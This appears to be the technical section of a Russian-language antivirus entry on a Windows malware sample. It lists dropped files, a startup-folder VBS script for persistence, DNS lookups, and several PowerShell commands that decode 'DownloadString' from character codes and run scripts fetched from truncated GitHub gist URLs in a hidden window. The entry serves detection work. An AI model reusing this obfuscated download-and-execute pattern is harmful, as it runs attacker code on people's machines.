Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\shvhost42.vbs
- %LOCALAPPDATA%\8tjglg93ghfprogr.exe
- %TEMP%\creativecloud\acc\adobedownload\hdinstaller.log
- %LOCALAPPDATA%\apisolo.vbs
- 'gi##.###hubusercontent.com':443
- DNS ASK gi##.###hubusercontent.com
- '%LOCALAPPDATA%\8tjglg93ghfprogr.exe'
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\apisolo.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4242aboabdoamail...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4343aboabb43amai...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4242aboabdoamail...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4343aboabb43amai...